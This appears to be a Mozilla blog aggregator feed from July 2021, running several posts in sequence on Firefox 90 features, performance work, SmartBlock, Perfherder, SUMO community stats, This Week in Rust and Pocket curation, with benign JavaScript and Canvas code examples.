So, JavaScript. Since our last progress report our current implementation of the Firefox JavaScript JIT (the minimum viable product of which will be Baseline Interpreter + Wasm) is now able to run scripts of significant complexity, but it's still mostly a one-man show and I'm currently struggling with an issue fixing certain optimized calls to self-hosted scripts (notably anything that calls RegExp.prototype.* functions: it goes into an infinite loop and hits the recursion limit). There hasn't been any activity the last week because I've preferred not to commit speculative work yet, plus the time I wasted tracking down the problem above with TLS. The MVP will be considered "V" when it can pass the JavaScript JIT and conformance test suites and it's probably a third of the way there. You can help. Ask in the comments if you're interested in contributing. We'll get this done sooner or later because it's something I'm motivated to finish, but it will go a lot faster if folks pitch in.

The Mozilla BlogOlivia Rodrigo, the cast of “The French Dispatch,” “Loki” and more are on this week’s Top Shelf

At Mozilla, we believe part of making the internet we want is celebrating the best of the internet, and that can be as simple as sharing a tweet that made us pause in our feed. Twitter isn’t perfect, but there are individual tweets that come pretty close.

Each week in Top Shelf, we share the tweets that made us laugh, think, Pocket them for later, text our friends, and want to continue the internet revolution.

Here’s what made it to the Top Shelf for the week of July 12, 2021, in no particular order.

The post Olivia Rodrigo, the cast of “The French Dispatch,” “Loki” and more are on this week’s Top Shelf appeared first on The Mozilla Blog.

Mozilla Reps CommunityNew Council Members – 2021 H1 Election

We are happy to welcome two new fully onboarded members to the Reps Council!

Hossain Al Ikram and Luis Sanchez join the other continuing members in leading the Reps Program. Tim Maks van den Broek was also re-elected and continues to contribute to the council.

Both Ikram and Luis are starting their activity as council members by contributing to the Mentorship project. They are focusing on supporting communication between the Mentors and the Council (such as preparing Mentors Calls) and on renewing and carrying out the onboarding for new Mentors.

As the new members become active in the Council, we want to thank outgoing members for their contributions. Thank you very much Shina and Faisal!

The Mozilla Reps Council is the governing body of the Mozilla Reps Program. It provides the general vision of the program and oversees day-to-day operations globally. Currently, 7 volunteers and 2 paid staff sit on the council. Find out more in the Reps wiki, and look up current members in the Community Portal.

Mozilla Performance BlogWhat’s new in Perfherder?

Since the last "What's new in Perfherder" article, a lot has changed. Our development team is making progress toward automating the regression detection process. This post covers the various improvements that have been made to Perfherder since July 2020.

Alerts view

We added tags for tests. They are meant to describe what type of test it is. For example, the alert below is the PerceptualSpeedIndex visual metric for the cold variant of reddit.

The “Tags” column is next to “Test and platform”

We improved the checkboxes on alert summaries so that all alert items with a specific status can be selected at once.

Check alerts menu

Talos tests now have links to documentation for every alert item, so if one isn't very familiar with the regressed/improved test, this documentation can help build a better understanding of it. The alert items can be sorted by the various columns present in the alerts view. We split the Test and platform column into Test and Platform, so we are now able to sort by platform as well.

The Previous Value, New Value, Absolute Difference, and Magnitude of Change were joined together into a single Magnitude of Change column as they were showing basically the same information. Last but not least, the graph link at the end of each test name was moved under the star as a graph icon.

The documentation link is present at the end of every test name and platform; the sorting buttons are available next to each column

Regression template

We’ve almost automated the filing of the regression bugs. We don’t have to copy-paste anymore the details from the regressor bug but just to input its number in the dialog below and the new bug screen the fields will auto-populate. The only thing that’s left to be automated is setting the Version of the bug, which should be the latest release of Firefox. It is currently set to unspecified.

File regression bug modal

The autofilled fields, Screen 1

The autofilled fields, Screen 2

The autofilled fields, Screen 3

Another cool thing that we improved is a link to the visual recordings of a browsertime pageload test. In the comment 0/description of the bug, the old and new (regressed) values are linked to a tgz archive that contains the video recording of the pageload test for each page cycle.

The before and after links are under the "Absolute values" column

Compare view

We added pagination to the compare view when the number of results is higher than 10, so we no longer have the problem of loading too many results on one page.

Compare view with pagination

Backfill tool

The backfill tool is probably the biggest surprise. We call it Sherlock. It runs every hour and checks that there are data points for the revision the alert was created on and for the previous one. It basically makes sure there are no gaps in the data points, so the culprit is identified precisely.

Backfill report email

UI/UX improvements

Of course, the improvements are not limited to those; we've also made various backend and front-end cleanups and optimizations that aren't directly visible in the UI:

  • The graph view tooltip was adjusted to avoid obscuring the target text
  • The empty alert summaries were removed from the database
  • The Perfherder UI was improved to better indicate mouse-overs and actionable elements

Firefox Add-on ReviewsFind an interesting image? Use an image search extension like Tineye to discover hidden details

Reverse image search is the process of using an image as the starting point of your search to learn more about the picture, where it came from, or its subjects. 

Why do people perform reverse image searches? Reasons vary, but there are typically two types of objectives:

Track images across the web

Use an image search extension to find all the places where an image is presented. This is useful for people like…

  • Photographers, digital artists and designers who want to know if their proprietary work is being used without credit, consent, or in inappropriate ways. 
  • Content marketers who want to measure the impact of images used in their campaigns. For instance, let’s say you included a picture of a new product in a press release. Image search can help you track how far and wide that promotional image has spread. 
  • Anyone who’s posted personal pics. With so many people posting images of themselves on social media and elsewhere, sometimes a person’s face can unwittingly wind up on a McDonald’s ad in China

Authenticate imagery

There are many reasons you might want to investigate the veracity of an image you find on the web…

  • Fake news! Unscrupulous “news” sources have been known to use false images in stories to distort narratives. If you question images seen in a news article, research it yourself with an image search extension. 
  • Verify business and personal contacts. Sometimes people are not who they appear to be—literally. If you’ve been contacted by a questionable marketer on LinkedIn or you’re wondering if the person you met on a dating app is legit, investigate the image. 
  • Give image credit. If you find an image to use in your own published work—for example, a blog post—and you want to credit the source, use a reverse image search extension to track down the owner.
Find a delicious-looking dish and want to know how to prepare it? Sometimes a reverse image search can track it back to an online recipe or cookbook.

With these cases in mind, here are a few of the best reverse image search extensions out there…

Tineye Reverse Image Search

A pioneer in the image search field, Tineye uses complex visual identification features—like finding patterns in lines, textures, colors, and contours of an image—to look for precise copies of the image elsewhere on the web. 

Tineye can also help you locate higher resolution versions of an image, should one exist; and it lets you know if the image in question is available for licensing. 

Tineye image searches are private. Your searches are not tracked, nor are the images you search saved to the Tineye index.

Search by Image

Combine the power of a bunch of image search engines with the Search by Image browser extension. More than 30 image search indexes offered in all, including the big names like Tineye, Google, Bing, and Yandex, but also some interesting niche indexes like Pinterest and Getty Images. 

You’re free to set your favorite image search engine as the default, or get results from as many of the 30+ engines as you like. Search by Image settings are simple and straightforward. 

Image Search Options

So easy to use. Simply right-click any image you find to pull up a context menu and select one of the available search engines, like Tineye, Google, Baidu, or Image Search Options’ very own image index called SauceNAO. 

If the extension doesn’t already offer your favorite image search engine, it’s easy to manually add it to Image Search Options. 

Happy image hunting with a browser extension! Find more image and other search tools on addons.mozilla.org.

This Week In RustThis Week in Rust 399

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

Official
Newsletters
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs
Papers
Miscellaneous

Crate of the Week

This week's crate is endbasic, an emulator friendly DOS / BASIC environment running on small hardware and the web.

Thanks to Julio Merino for the suggestion.

Submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

Synth

Forest

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from Rust Core

254 pull requests were merged in the last week

Rust Compiler Performance Triage

Mostly quiet week; improvements outweighed regressions.

Triage done by @simulacrum. Revision range: 9a27044f4..5aff6dd

1 Regressions, 4 Improvements, 0 Mixed; 0 of them in rollups

Full report here.

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs

No RFCs are currently in the final comment period.

Tracking Issues & PRs
New RFCs

Upcoming Events

Online
North America

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs

GraphCDN

Netlify

ChainSafe Systems

NZXT

Kollider

Tempus Ex

Estuary

Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

Beginning Rust: Uh why does the compiler stop me from doing things this is horrible

Advanced Rust: Ugh why doesn't the compiler stop me from doing things this is horrible

qDot on twitter

Thanks to Nixon Enraght-Moony for the self-suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, and cdmistman.

Discuss on r/rust

Hacks.Mozilla.OrgGetting lively with Firefox 90

As the summer rolls around for those of us in the northern hemisphere, temperatures are high and unwinding with a cool iced tea is high on the agenda. Isn't it lucky, then, that Background Update is here for Windows, which means Firefox can update even if it's not running. We can just sit back and relax!

Also this release we see a few nice JavaScript additions, including private fields and methods for classes, and the at() method for Array, String and TypedArray global objects.

This blog post just provides a set of highlights; for all the details, check out the following:

Classes go private

A feature JavaScript has lacked since its inception, private fields and methods are now enabled by default in Firefox 90. These allow you to declare private properties within a class. You cannot reference these private properties from outside of the class; they can only be read or written within the class body.

Private names must be prefixed with a ‘hash mark’ (#) to distinguish them from any public properties a class might hold.

This shows how to declare private fields as opposed to public ones within a class:

class ClassWithPrivateProperties {

  #privateField;
  publicField;

  constructor() {

    // can be referenced within the class, but not accessed outside
    this.#privateField = 42;

    // can be referenced within the class as well as outside
    this.publicField = 52;
  }

  // again, can only be used within the class
  #privateMethod() {
    return 'hello world';
  }

  // can be called when using the class
  getPrivateMessage() {
    return this.#privateMethod();
  }
}
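
To illustrate the distinction, here's a hypothetical usage of the class above (the instance variable is ours, not from the original post):

const instance = new ClassWithPrivateProperties();
console.log(instance.publicField);         // 52
console.log(instance.getPrivateMessage()); // "hello world"
// instance.#privateField;                 // SyntaxError: private fields can't be referenced outside the class body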

Static fields and methods can also be private. For a more detailed overview and explanation, check out the great guide: Working with private class features. You can also read what it takes to implement such a feature in our previous blog post Implementing Private Fields for JavaScript.

JavaScript at() method

The relative indexing method at() has been added to the Array, String and TypedArray global objects.

Passing a positive integer to the method returns the item or character at that position. The highlight of this method, however, is that it also accepts negative integers, which count back from the end of the array or string. For example, 1 would return the second item or character, and -1 would return the last item or character.

This example declares an array of values and uses the at() method to select an item in that array from the end.

const myArray = [5, 12, 8, 130, 44];

let arrItem = myArray.at(-2);

// arrItem = 130

It’s worth mentioning there are other common ways of doing this, however this one looks quite neat.

Conic gradients for Canvas

The 2D Canvas API has a new createConicGradient() method, which creates a gradient around a point (rather than from it, like createRadialGradient()). This feature allows you to specify where you want the center to be and in which direction the gradient should start. You then add the colours you want and where they should begin (and end).

This example creates a conic gradient with 5 colour stops, which we use to fill a rectangle.

var canvas = document.getElementById('canvas');

var ctx = canvas.getContext('2d');

// Create a conic gradient
// The start angle is 0
// The centre position is 100, 100
var gradient = ctx.createConicGradient(0, 100, 100);

// Add five color stops
gradient.addColorStop(0, "red");
gradient.addColorStop(0.25, "orange");
gradient.addColorStop(0.5, "yellow");
gradient.addColorStop(0.75, "green");
gradient.addColorStop(1, "blue");

// Set the fill style and draw a rectangle
ctx.fillStyle = gradient;
ctx.fillRect(20, 20, 200, 200);

The result looks like this:

Rainbow radial gradient

New Request Headers

Fetch metadata request headers provide information about the context from which a request originated. This allows the server to make decisions about whether a request should be allowed based on where the request came from and how the resource will be used. Firefox 90 enables the following by default: Sec-Fetch-Site, Sec-Fetch-Mode, Sec-Fetch-User, and Sec-Fetch-Dest.
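
As a hypothetical illustration (these exact values are ours, not from the original post), a cross-site image request might carry metadata like the following, which a server could use to refuse serving the resource in that context:

Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site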

The post Getting lively with Firefox 90 appeared first on Mozilla Hacks - the Web developer blog.

Mozilla Performance BlogBringing you a snappier Firefox

In this blog post we’ll talk about what the Firefox Performance team set out to achieve for 2021 and the Firefox 89 release last month. With the help of many people from across the Firefox organization, we delivered a 10-30% snappier, more instantaneous Firefox experience. That’s right, it isn’t just you! Firefox is faster, and we have the numbers to prove it.

Some of the things you might find giving you a snappier response are:

  • Typing in the URL bar or a document editor (like Google Docs or Office 365)
  • Opening a site menu like the file menu on Google Docs
  • Playing a browser based video game and using your keyboard to control your movements within the video

Our Goals

We have made many page-load and startup performance improvements over the last couple of years which have made Firefox measurably faster. But we hadn’t spent much time looking at how quickly the browser responds to little user interactions like typing in a search bar or changing tabs. Little things can add up, and we want to deliver the best performance for every user experience. So, we decided it was time to focus our efforts on responsiveness performance starting with the Firefox June release.

Responsiveness

The meaning of the word responsiveness as used within computer applications can be rather broad, so for the purpose of this blogpost, we will define three types of experiences that can impact the responsive feel of a browser.

  1. Instantaneous responsiveness: These are simple actions taken by a user where the browser ought to respond instantly. An example is pressing a key on your keyboard in a document or an input field. You want these to be displayed as swiftly as possible, giving the user a sense of instantaneous feedback. In general this means we want the results for these interactions to be displayed within 50ms[1] of the user taking an action.
  2. Small but perceptible lag: This is an interaction where the response is not instantaneous and there is enough work involved that it is not expected to be. The lag is sufficient for the user to perceive it, even if they are not distracted from the task at hand. This is something like switching between channels on Slack or selecting an email in Gmail. A typical threshold for this would be that these interactions occur in under a second.
  3. Jank: This is when a site, or in the worst case the browser UI itself, actually becomes unresponsive to user input for a non-insignificant amount of time. These are disruptive and perceptible pauses in interaction with the browser.

Instantaneous Responsiveness

We’ve had some pretty solid indications (from tests and proofs of concepts) that we could make our already fast interactions feel even more instantaneous. One area in particular that stood out to us was the ‘depth’ of our painting pipeline.

About our painting pipeline

Let’s talk about that a little more. Here you can see a graphical representation of our old painting pipeline:

Most users currently use 60Hz monitors, which means their monitor displays 60 frames per second. Each segment of the timeline above represents a single frame on the screen and is approximately 16.67ms.

In most cases, when input is received from the operating system, it would take anywhere from 0 to 16.67ms for the next frame to occur (1), and at the start of that new frame, we would paint the resulting changes to the UI (the green rectangle).

Then another 16.67ms later (2), we would composite the results of that drawing onto the browser window, which would then be handed off to the OS (the blue rectangle).

At the earliest, it would be another 16.67ms later (3) when the operating system would actually present the result of the user interaction (input) to the user. This means even in the ideal case it would take at least 34-50ms for the result of an interaction to show up on the screen. But often there is other work the browser might be doing, or additional latency introduced by the input devices, the operating system, or the display hardware that would make this response even slower.

Shortening the Painting Pipeline

We set out to improve that situation by shortening the painting pipeline and by better scheduling when we handle input events. Some of the first results of this work were landed by Matt Woodrow, where he implemented a suggestion by Markus Stange in bug 1675614. This essentially changed the painting pipeline like this:

We now paint as soon as we finish processing user input if we believe we have enough time to finish before the next frame comes in. This means we can then composite the results one frame earlier. So in most cases, this will result in the frame being seen a whole 16.67ms earlier by the users. We’ll talk some more about the results of this work later.

Currently this solution doesn’t always work, for example if there are other animations happening. In Firefox 91, we’re bringing this to more situations as well as improvements to the scheduling of our input event handling. We’ll be sure to talk more about those in future blog posts!

Small but perceptible lag

When it comes to small but perceptible lags in interaction, we found that the majority of lags are caused by time spent in JavaScript code. Much has been written about why JavaScript engines in their current form are often optimized for the wrong thing. TL;DR – Years of optimizing for benchmarks have driven a lot of decisions inside the engine that do not match well with real world web applications and frameworks like React.

Real World JavaScript Performance

In order to address this, we’ve begun to closely investigate commonly used websites in an attempt to understand where our browser may be under-performing on these workloads. Many different experiments fell out of this, and several of these have turned into promising improvements to SpiderMonkey, Firefox’s JavaScript engine. (The SpiderMonkey team has their own blog, where you can follow along with some of the work they’re doing.) One result of these experiments was an improvement to array iterators (bug 1699851), which gave us a surprise improvement in the Firefox June Release.

Along with this, many other ideas were prototyped and implemented for future versions. From improvements to the architecture of object structures to faster for-of loops, the JavaScript team has contributed much of their time to offering significant improvements to real world JS performance that are setting us up for plenty of further improvements to come throughout the rest of 2021. We’d especially like to thank Ted Campbell, Iain Ireland, Steve Fink, Jan de Mooij and Denis Palmeiro for their many contributions!

Jank

Through hard work from Florian Quèze and Doug Thayer, we now have a Background Hang Reporter tool that helps us detect (and ultimately fix) browser jank.

Background Hang Reporter

While still in the early stages of development, this tool has already proven extremely useful. The resulting data can be found here. This essentially makes it possible for us to see the stacktraces of frequently seen main thread hangs inside the Firefox parent process. We can also attach bugs to these hangs in the tool, and this has already helped us address some important issues.

For example, we discovered that accessibility was being enabled unnecessarily for most Windows users with a touchscreen. In order to facilitate accessibility features, the browser does considerable extra work. While this extra work is critical to our many users that require these accessibility features, it caused considerable jank for many users that did not need them. James Teh’s assistance was invaluable in resolving this, and with the landing of bug 1687535, the number of users with accessibility code unnecessarily enabled, as well as the number of associated hang reports, has gone down considerably.

Measuring performance

Along with all this work, we’ve also been in the process of attempting to do better at measuring the performance for our users ‘in the wild’, as we like to say. This means adding more telemetry probes that collect data about how your browser is performing in an anonymous way, without compromising your privacy. This allows us to detect improvements with an accuracy that no form of internal testing can really provide.

Improved “instantaneous responsiveness”

As an example, we can look at the latency of our keyboard interactions. This describes the time from the operating system delivering us a keyboard event to us handing the frame off to the window manager:

If we take into account an additional frame the OS requires to display our change, 34ms is approximately the time required to hit the 50ms "instantaneous" threshold (50ms minus one ~16.67ms frame leaves roughly 34ms for our own processing). Looking at the 28-35ms bucket, we see that we now hit that target more than 40% of the time, versus less than 30% in Firefox 86.

Improved “Small but perceptible lag”

Another datapoint we can look at tells us more about the speed of our JS processing: it describes the time from when we receive an input event from the operating system to when we've processed the JavaScript handler associated with that input event.

If we look carefully, we can see a small but consistent shift from the higher buckets to the lower buckets. We've been able to track this improvement down, and it appears to have occurred right around the landing of bug 1699851. Since we had not been able to detect this improvement internally outside of microbenchmarks, it reaffirms the value of improving our telemetry further to better determine how our work impacts real users.

What’s Next?

We’d like to again thank all the people (including those we might have forgotten!) that contributed to these efforts. All the work described above is still in its early days, and all the improvements we’ve shown here are the result of first steps taken as a part of more extensive plans to improve Firefox responsiveness.

So if you feel Firefox is more responsive, it isn’t just your imagination, and more importantly, we’ve got more speedups coming!


[1] Research varies widely on this so we choose 50ms as a latency threshold which is imperceptible to most users.

Mozilla Security BlogFirefox 90 introduces SmartBlock 2.0 for Private Browsing

Today, with the launch of Firefox 90, we are excited to announce a new version of SmartBlock, our advanced tracker blocking mechanism built into Firefox Private Browsing and Strict Mode. SmartBlock 2.0 combines a great web browsing experience with robust privacy protection, by ensuring that you can still use third-party Facebook login buttons to sign in to websites, while providing strong defenses against cross-site tracking.

At Mozilla, we believe that privacy is a fundamental right. As part of the effort to provide a strong privacy option, Firefox includes the built-in Tracking Protection feature that operates in Private Browsing windows and Strict Mode to automatically block scripts, images, and other content from being loaded from known cross-site trackers. Unfortunately, blocking such cross-site tracking content can break website functionality.

Ensuring smooth logins with Facebook

Logging into websites is, of course, a critical piece of functionality. For example: many people value the convenience of being able to use Facebook to sign up for, and log into, a website. However, Firefox Private Browsing blocks Facebook scripts by default: that’s because our partner Disconnect includes Facebook domains on their list of known trackers. Historically, when Facebook scripts were blocked, those logins would no longer work.

For instance, if you visit etsy.com in a Private Browsing window, the front page gives the following options to sign in, including a button to sign in using Facebook's login service. If you click on the Enhanced Tracking Protection shield in the address bar and then click on Tracking Content, however, you will see that Firefox has automatically blocked third-party tracking content from Facebook to prevent any possible tracking of you by Facebook on that page:

Etsy sign-in form using "Continue with Facebook"

Prior to Firefox 90, if you were using a Private Browsing window, when you clicked on the "Continue with Facebook" button to sign in, the sign-in would fail to proceed because the required third-party Facebook script had been blocked by Firefox.

Now, SmartBlock 2.0 in Firefox 90 eliminates this login problem. Initially, Facebook scripts are all blocked, just as before, ensuring your privacy is preserved. But when you click on the “Continue with Facebook” button to sign in, SmartBlock reacts by quickly unblocking the Facebook login script just in time for the sign-in to proceed smoothly. When this script gets loaded, you can see that unblocking indicated in the list of blocked tracking content:

SmartBlock 2.0 provides this new capability on numerous websites. On all websites where you haven’t signed in, Firefox continues to block scripts from Facebook that would be able to track you. That’s right — you don’t have to choose between being protected from tracking or using Facebook to sign in. Thanks to Firefox SmartBlock, you can have your cake and eat it too!

And we’re baking more cakes! We are continuously working to expand SmartBlock’s capabilities in Firefox Private Browsing and Strict Mode to give you an even better experience on the web while continuing to provide strong protection against trackers.

Thank you

Our privacy protections are a labor of love. We want to acknowledge the work and support of many people at Mozilla that helped to make SmartBlock possible, including Paul Zühlcke, Johann Hofmann, Steven Englehardt, Tanvi Vyas, Wennie Leung, Mikal Lewis, Tim Huang, Dimi Lee, Ethan Tseng, Prangya Basu, and Selena Deckelmann.

The post Firefox 90 introduces SmartBlock 2.0 for Private Browsing appeared first on Mozilla Security Blog.

Support.Mozilla.OrgWhat’s up with SUMO – July 2021

Hey SUMO folks,

Welcome to a new quarter. Lots of projects and planning are underway. But first, let’s take a step back and see what we’ve been doing for the past month.

Welcome on board!

  1. Hello to strafy, Naheed, Taimur Ahmad, and Felipe. Thanks for contributing to the forum and welcome to SUMO!

Community news

  • The advanced search syntax is available on our platform now (read more about it here).
  • Our wiki has a new face now. Please take a look and let us know if you have any feedback.
  • Another reminder to check out Firefox Daily Digest to get daily updates about Firefox. Go check it out and subscribe if you haven’t already.
  • Check out the following release notes from Kitsune this month:

Community call

  • Watch the monthly community call if you haven’t. Learn more about what’s new in June!
  • Reminder: Don’t hesitate to join the call in person if you can. We try our best to provide a safe space for everyone to contribute. You’re more than welcome to lurk in the call if you don’t feel comfortable turning on your video or speaking up. If you feel shy to ask questions during the meeting, feel free to add your questions on the contributor forum in advance, or put them in our Matrix channel, so we can address them during the meeting.

Community stats

KB

KB Page views

Month       Page views   Vs previous month
June 2021   9,125,327    +20.04%

Top 5 KB contributors in the last 90 days: 

  1. AliceWyman
  2. Michele Rodaro
  3. Pierre
  4. Romado33
  5. wsmwk

KB Localization

Top 10 locale (besides en) based on total page views

Locale   Apr 2021 page views   Localization progress (as of Jul 8)
de       10.21%                100%
fr       7.51%                 89%
es       6.58%                 46%
pt-BR    5.43%                 65%
ru       4.62%                 99%
zh-CN    4.23%                 99%
ja       3.98%                 54%
pl       2.49%                 84%
it       2.42%                 100%
id       1.61%                 2%

Top 5 localization contributors in the last 90 days: 

  1. Milupo
  2. JimSp472
  3. Soucet
  4. Michele Rodaro
  5. Artist

Forum Support

Forum stats

Month      Total questions   Answer rate within 72 hrs   Solved rate within 72 hrs   Forum helpfulness
Jun 2021   4676              63.58%                      15.93%                      78.33%

Top 5 forum contributors in the last 90 days: 

  1. Cor-el
  2. Jscher2000
  3. FredMcD
  4. Seburo
  5. Sfhowes

Social Support

Channel (Jun 2021)   Total conv   Conv handled
@firefox             7082         160
@FirefoxSupport      1274         448

Top 5 contributors in Q1 2021

  1. Christophe Villeneuve
  2. Pravin
  3. Emin Mastizada
  4. Md Monirul Alom
  5. Andrew Truong

Play Store Support

We don’t have enough data for the Play Store Support yet. However, you can check out the overall Respond Tool metrics here.

Product updates

Firefox desktop

  • FX Desktop V90 (07/13)
    • Shimming Exceptions UI (SmartBlock)
    • DNS over HTTPS – remote settings config
    • Background Update Agent (BAU)
    • About:third-party

Firefox mobile

  • FX Android V90 (07/13)
    • Credit Card Auto-Complete
  • FX IOS V35 (07/13)
    • Folders for your Bookmarks
    • Opt-in or out of Experiments

Other products / Experiments

  • Mozilla VPN V2.4 (07/13)
    • Split Tunneling (Windows and Linux)
    • Support for Local DNS
    • Addition of in-app feedback submission
    • Variable Pricing addition (EU and US)
    • Expansion Phase 2 to EU (Spain, Italy, Belgium, Austria, Switzerland)

Shout-outs!

  • Kudos to everyone who's been helping with the Firefox 89 release.
  • Franz, for helping with the forum and for the search handover insight.

If you know anyone that we should feature here, please contact Kiki and we’ll make sure to add them in our next edition.

Useful links:

The Mozilla BlogBreak free from the doomscroll with Pocket

Last year a new phrase crept into the zeitgeist: doomscrolling, the tendency to get stuck in a bad news content cycle even when consuming it makes us feel worse. That's no surprise given that 2020 was one for the books, with an unrelenting flow of calamitous topics, from the pandemic to murder hornets to wildfires. Even before we had a name for it and real life became a Nostradamus prediction, it was all too easy to fall into the doomscroll trap. Many content recommendation algorithms are designed to keep our eyeballs glued to a screen, potentially leading us into more questionable, extreme or ominous territory.

Pocket, the content recommendation and saving service from Mozilla, offers a brighter view, inviting readers to take a different direction with high-quality content and an interface that isn’t designed to trap you or bring you down. You can get great recommendations and also save content to your Pocket, both in the app and through Firefox, every time you open a new tab in the browser. Pocket doesn’t send you down questionable rabbit holes or bombard you with a deluge of depressing or anxiety-producing content. Its recommendations are vetted by thoughtful, dedicated human editors who do a lot of reading and watching so you don’t have to dig through the muck.

“I’ve always loved reading, and it is definitely a thrill to read all day at my desk and not feel like I’m procrastinating. I’m actually doing my job,” said Amy Maoz, Pocket recommendations editor.

Amy and colleague Alex Dalenberg are two members of Pocket’s human curator team, and they are some of the people who look after the stories that appear on the Firefox new tab page.

Every day, Pocket users save millions of articles, videos, links and more from across the web, forming the foundation of Pocket’s recommendations. From this activity, Pocket’s algorithms surface the most-saved and most-read content from the Pocket community. Pocket’s human curators then sift through this material and elevate great reads for the recommendation mix: in-depth features, clever explainers, curiosity chasers, timely reads and evergreen pieces. The curator team makes sure that a wide assortment of publishers are represented, as well as a large variety of topics, including what’s happening in the world right now. And it’s done in a way that respects and preserves the privacy of Pocket readers.

“I’m consistently impressed and delighted by what great content Pocket users find all across the web,” said Maoz. “Our users do an incredible job pointing us to fascinating, entertaining and informative articles and videos and more.”

“Saving something in your Pocket is different from, say, pressing the ‘like’ button on it,” Alex Dalenberg, Pocket recommendations editor, added. “It’s more personal. You are saving it for later, so it’s less performative. And that often points us to real gems.”

It makes sense that a lot of big, juicy stories end up in Pocket; articles from The New York Times, The Guardian, Wired and The Ringer are regularly among the top-saved by readers. Pocket’s algorithms also flag stories from smaller publications that receive a notable number of saves and highlight them to the curators for consideration. That allows smaller publications and diverse voices to get wider exposure for content that might have otherwise flown under the radar.

“The power of the web is that everybody owns a printing press now, but I feel like we’ve lost a bit of that web 1.0 or 1.5 feeling,” Dalenberg said. “It’s always really exciting when we can surface exceptional content from smaller players and indie web publications, not just the usual suspects. It’s also great to hear people say how much they like discovering new publications because they saw them in Pocket’s recommendations.”

The power of a Pocket recommendation

Scalawag magazine is a small nonprofit publication dedicated to U.S. Southern culture and issues, with a belief that great storytelling and reporting can lead to policy changes. Last June, Scalawag published a round-up piece entitled Reckoning with white supremacy: Five fundamentals for white folks to share how they had been covering issues of systemic racism in the South and police systems since it launched in 2015.

“I wrote it mostly for other folks on the team to use as a guide to send to well-meaning friends who found themselves suddenly interested in these issues in the summer of protests, almost as a reference guide for people unfamiliar with our work but who wanted to learn more,” said Lovey Cooper, Scalawag’s Managing Editor and author of the piece.

Cooper published it on a Wednesday evening and sent it to a few friends on Thursday. By Friday morning, traffic was suddenly overwhelming their site, and Pocket was the driver. The Pocket team had recommended Cooper’s story on the Firefox new tab, and people were reading it. Lots of them.

“I watched the metrics as I sat on the phone with various tech gurus to get the site back up and running, and within two hours — even with the site not working anywhere except in-app viewers like Pocket — the piece became our most viewed story of the year,” she said.

Between Friday and Sunday, Scalawag saw more than five times its usual average monthly visitors to the site. They gained hundreds of new email subscribers, and thousands in expected lifetime membership and one-time donation revenue from readers who had not previously registered on the site. It became the most viewed story Scalawag had ever published, beating out by a huge margin the couple of times The New York Times featured them.

“The rest of June was a whirlwind too,” Cooper said. “We were being asked to speak on radio programs and at events like never before, due to our unique positioning as lifelong champions of racial and social justice. Just as those topics came into the mainstream zeitgeist, we were perfectly poised to showcase to the world that, yes, Scalawag has indeed always been fighting this fight with our stories — and here are the articles to prove it.”

Cooper’s piece was also included in a Pocket collection, What We’re Reading: The Fight for Racial Equity, Justice and Black Lives. Pocket has continued to publish Racial Justice collections, a set of in-depth collections curated by Black scholars, journalists and writers.

“We saw this as an opportunity to use our platform to amplify and champion Black voices and diverse perspectives,” said Carolyn O’Hara, Director of Editorial at Pocket. “We have always felt that it’s our responsibility at Pocket to highlight pieces that can inform and inspire from all across the web, and we’re more committed to that than ever.”

Scalawag’s story shows how Pocket’s curated recommendations can provide hungry readers with context and information while elevating smaller publishers whose thoughtful content deserves more attention and readership.

Quality content over dubious information

The idea that everyone has a printing press thanks to the internet is a double-edged sword. Anyone can publish anything, which has opened the door to a cottage industry of misinformation that then shows up on social media. With more people turning to social media as their news and information source, unvetted misinformation quickly takes off and does damage. But you won’t find it in Pocket.

The Pocket editorial team works hard to maintain one bias: quality content. Along with misinformation, you won’t find clickbait on Pocket, nor are you likely to find breaking news. Those are more in-the-moment reads rather than save-for-later reads. Maoz asserts that no one really saves articles like Here’s what 10 celebs look like in bikinis to read tomorrow. They might click it, but they don’t hold onto it with Pocket.

And when it comes to current events and breaking news, you’ll find that Pocket recommendations often take a wider or higher-altitude view. “We’re not necessarily recommending the first or second day story but the Sunday magazine story,” Dalenberg adds, since it’s often the longer, more in-depth reads that users are saving. That would be the history of the bathing suit, for example, rather than a clickbait celeb paparazzi story whose goal might be more to deploy online tracking and serve ads than to provide quality content.

“People are opening a new tab in Firefox to do something, and we aren’t trying to shock or surprise them into clicking on our recommendations, to bait them into engaging, in other words,” said Maoz. “We’re offering up content we believe is worthy of their time and attention.”

Curators won’t recommend content to Pocket that they believe is misleading or sensational, or from a source without a strong history of integrity. They also avoid articles based on studies with just a single source, choosing instead to wait until there is more information to confirm or debunk the story. They also review the meta-image – the preview image that appears when an article is shared. Since they don’t have control over what image a publisher selects, they take care to avoid surprising people with inappropriate visuals on the Firefox new tab.

As part of the Mozilla family, Pocket, like Firefox, looks out for your privacy.

“Pocket doesn’t mine everyone’s data to show them creepily targeted stories and things they don’t actually want to read,” Maoz said. “When I tell people about what I do at Pocket, I always tie it back to privacy, which I think is really cool. That’s basically why we have jobs — because Mozilla cares about privacy.”

The post Break free from the doomscroll with Pocket appeared first on The Mozilla Blog.

William Lachance10 years at Mozilla

Yesterday (July 11, 2021) marked 10 years since I started at the Mozilla Corporation. My life has changed a ton in those years: in that time I ended a marriage, changed the city in which I live twice, and took up religion1. Mozilla has also changed pretty drastically in my time here, especially in the last year.

